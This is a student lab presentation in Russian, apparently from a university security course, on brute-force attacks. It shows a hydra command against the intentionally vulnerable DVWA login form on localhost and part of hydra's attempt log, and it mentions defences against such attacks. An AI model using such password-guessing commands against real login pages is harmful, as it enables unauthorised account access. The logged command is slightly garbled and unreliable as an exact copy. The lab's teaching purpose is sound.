

# Индивидуальный проект - этап 3

---

Буянбадрах Тогтохжав<sup>1</sup>

3 марта, 2025, Москва, Россия

<sup>1</sup>Российский Университет Дружбы Народов

# Цели и задачи работы

---

# Цель лабораторной работы

Целью данной работы является изучение атак типа брут-форс и инструмента hydra.

# **Процесс выполнения лабораторной работы**

---

Атака брут-форс (англ. brute force attack) — это метод взлома, основанный на последовательном переборе возможных комбинаций значений (паролей, ключей шифрования и т. д.), чтобы подобрать правильное значение и получить несанкционированный доступ.

Атаки брут-форс являются одним из самых простых, но эффективных способов взлома учетных записей, если системы не защищены должным образом.

Сильные пароли, ограничения на количество попыток входа и двухфакторная аутентификация могут значительно уменьшить вероятность успешной атаки.



Рис. 1: Страница веб-формы

## Команда для запуска hydra

```
hydra -l admin -P /usr/share/dirb/wordlists/small.txt \  
localhost http-get-form "/DVWA/vulnerabilities/brute/" \  
:username=^USER^&password=^PASS^&Login=Login: \  
H=Cookie: PHPSESSID=f2q94tbasiksr9q31mlg9d4qum; \  
security=medium:F=Username and/or password incorrect." \  
-V
```



# Результат подбора

```
(user@btogtohzhav)~$  
$ hydra -l admin -P /usr/share/dirb/wordlists/small.txt localhost http-get-form "/DVWA/vulnerabilities/brute/:username  
-\"USER\"&password=\"PASS\"&login=Login:H=Cookie: PHPSESSID=bnr8cknsd8p5cguf10fq1j0f4n; security-medium:F=Username and/or pa  
ssword incorrect.\" -v  
  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations,  
or for illegal purposes (this is non-binding, these ** ignore laws and ethics anyway).  
  
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-02 04:37:07  
[DATA] max 16 tasks per 1 server, overall 16 tasks, 959 login tries (l:1/p:959), ~60 tries per task  
[DATA] attacking http-get-form://localhost:80/DVWA/vulnerabilities/brute/:username-\"USER\"&password=\"PASS\"&login=Login:H=  
Cookie: PHPSESSID=bnr8cknsd8p5cguf10fq1j0f4n; security-medium:F=Username and/or password incorrect.  
[ATTEMPT] target localhost - login \"admin\" - pass \"0\" - 1 of 959 [child 0] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"00\" - 2 of 959 [child 1] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"01\" - 3 of 959 [child 2] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"02\" - 4 of 959 [child 3] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"03\" - 5 of 959 [child 4] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"1\" - 6 of 959 [child 5] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"10\" - 7 of 959 [child 6] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"100\" - 8 of 959 [child 7] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"1000\" - 9 of 959 [child 8] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"123\" - 10 of 959 [child 9] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"2\" - 11 of 959 [child 10] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"20\" - 12 of 959 [child 11] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"200\" - 13 of 959 [child 12] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"2000\" - 14 of 959 [child 13] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"2001\" - 15 of 959 [child 14] (0/0)  
[ATTEMPT] target localhost - login \"admin\" - pass \"2002\" - 16 of 959 [child 15] (0/0)
```

Рис. 2: Результат подбора

## **Выводы по проделанной работе**

---

Мы приобрели знания об атаках брут-форс и инструменте hydra.